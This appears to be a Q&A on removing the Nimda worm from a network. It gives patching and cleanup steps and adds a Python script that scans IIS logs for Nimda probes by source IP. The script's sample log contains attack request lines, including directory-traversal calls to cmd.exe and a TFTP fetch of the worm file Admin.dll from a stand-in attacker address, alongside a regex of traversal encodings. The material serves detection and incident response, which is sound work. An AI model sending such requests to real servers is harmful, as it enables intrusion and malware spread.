The Nimda virus has infected my network. Norton Antivirus states that it only is placing the file in quarantine and not cleaning the virus. I also get numerous files with the same name and the suffix .eml on all of my servers. Is there any way I can trace where the virus is coming from? How do I get rid of it completely?
I feel your pain. Here are a few points first before I answer:
Antivirus should be running on all desktops and servers with logging.
Both desktop and server installs should be locked to only your specifications.
These installs should report all viruses to the main console or site.
Company policy should dictate no use of removable media from outside the company without first scanning them.
Viruses should be deleted!!! Yes, delete them as to NOT spread them.
If these procedures were in place, you would know when and if a virus hit your network. The logging/alerts would be sent to you, then you would know where they are arriving into your network.
Okay, now let's see if I can answer you:
Change the Norton configuration to "delete" all viruses and clean. Change every desktop and server in the company, no matter the length of time to accomplish this. I know one company that did all 10,000 desktops and servers in a weekend simply because they did not have remote management. It was that important due to loss of hours and data.
Check the patch levels of all Microsoft devices (OS, IIS, SQL, Exchange). Microsoft reports that if all your systems are patched, Nimda should die quickly.
Your .eml problem may be an Aliases problem related to the following: Klaz (F-Secure), TROJ_KLEZ.C (Trend), W32.Klez.D@mm (NAV), W32/Klez (Panda), W32/Klez.a@MM, W32/Klez.b@MM, W32/Klez.eml, W32/Klez@MM, Win32.Klez.D@mm (AVX)
Check www.mcafee.com for references to each of these. Here are specific instructions from McAfee:
Removing the .eml threat requires patching vulnerable systems, disabling network shares, and using the latest DAT files. It cannot be removed manually.
Infected systems must:
- Apply the patches
- Close any network shares prior to cleaning
- Exit any running applications
- Stop a running IIS server
- Scan and clean each drive
- Restore the RICHED20.DLL and MMC.EXE files if they were overwritten by the virus and deleted by the scanner.
You may need to accomplish further work on the .eml issue. It may or may not be Nimda related. Since I do not have first-hand access to your systems and have not seen the logs or reports, I can only assume facts.
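The questioner asks how to trace where the virus is coming from, and the answer's point is that logs tell you where it is arriving. Nimda spreads to IIS servers over HTTP, so the IIS logs on each web server are the place to look. The following script is an added example, not part of the original question or answer and not McAfee's or Symantec's code: it reads an IIS W3C extended log, flags the request shapes Nimda is documented to use when it probes and infects IIS (the root.exe backdoor, cmd.exe reached through mapped virtual roots or Unicode/double-decode traversal, and the TFTP fetch of Admin.dll, as listed in CERT advisory CA-2001-26), and tallies them by source IP. The log lines are constructed, the IP addresses are documentation ranges, and the function names are the author's own. A 200 on a cmd.exe or Admin.dll request means the server actually ran the command, which is the practitioner's signal that that host was unpatched and should be treated as infected, not just scanned.

```python
"""Tally Nimda-style IIS probes by source IP from a W3C extended log (added example)."""
import re
from collections import defaultdict

# Constructed sample in IIS 5 W3C extended log format (not a real capture).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-09-18 13:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:00:01 192.0.2.10 GET /scripts/root.exe /c+dir 404
2001-09-18 13:00:02 192.0.2.10 GET /MSADC/root.exe /c+dir 404
2001-09-18 13:00:03 192.0.2.10 GET /c/winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:00:04 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:00:05 198.51.100.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp%20-i%20198.51.100.7%20GET%20Admin.dll 200
2001-09-18 13:00:06 203.0.113.5 GET /index.htm - 200
2001-09-18 13:00:07 203.0.113.5 GET /images/logo.gif - 200
"""

# Directory-traversal encodings Nimda uses to reach cmd.exe through /scripts and
# /MSADC (Unicode and double-decode variants, per CERT CA-2001-26).
TRAVERSAL_RE = re.compile(
    r"\.\.(%255c|%%35c|%%35%63|%25%35%63|%c0%af|%c1%9c|%c1%1c|%c1%pc|%c0%9v|%c0%qf|%c1%8s|%5c)",
    re.IGNORECASE,
)


def classify(stem: str, query: str):
    """Return the kind of Nimda probe a request is, or None for ordinary traffic."""
    s, q = stem.lower(), query.lower()
    # The infection step: cmd.exe is told to TFTP the worm body (Admin.dll) from the attacker.
    if "admin.dll" in q and "tftp" in q:
        return "tftp-admin.dll-copy"
    # root.exe is the backdoor left by earlier worms; Nimda tries it first.
    if s.endswith("/root.exe"):
        return "root.exe-backdoor"
    if s.endswith("/cmd.exe"):
        if TRAVERSAL_RE.search(s):
            return "cmd.exe-traversal"
        # /c/ and /d/ are virtual roots mapped to C: and D: by earlier compromises.
        if s.startswith(("/c/", "/d/")):
            return "cmd.exe-mapped-drive"
        return "cmd.exe-other"  # a web request for cmd.exe is never legitimate
    return None


def parse_iis_log(text: str):
    """Parse W3C extended log text into dicts keyed by the names in the #Fields line."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Version, #Date)
        if fields is None:
            raise ValueError("data line appears before the #Fields header")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # skip a malformed line rather than abort the sweep
        rows.append(dict(zip(fields, parts)))
    return rows


def summarize(text: str):
    """Per-source-IP count of Nimda probes, how many got a 200, and which kinds were seen."""
    report = defaultdict(lambda: {"probes": 0, "succeeded": 0, "kinds": set()})
    for row in parse_iis_log(text):
        kind = classify(row.get("cs-uri-stem", ""), row.get("cs-uri-query", ""))
        if kind is None:
            continue
        entry = report[row["c-ip"]]
        entry["probes"] += 1
        entry["kinds"].add(kind)
        if row.get("sc-status") == "200":
            entry["succeeded"] += 1
    return dict(report)


if __name__ == "__main__":
    # Point this at a real log, e.g. open(r"C:\WINNT\system32\LogFiles\W3SVC1\ex010918.log").read()
    for ip, info in summarize(SAMPLE_LOG).items():
        flag = "COMMAND RAN" if info["succeeded"] else "probed only"
        print(f"{ip}: {info['probes']} probes, {info['succeeded']} succeeded ({flag}): {sorted(info['kinds'])}")
```

Run it against the log of every IIS server; the source IPs that show up are the infected machines on your side (or the outside hosts hitting you), and any server whose own log shows a 200 on a cmd.exe or Admin.dll request was successfully exploited and belongs at the front of the patch-and-clean queue.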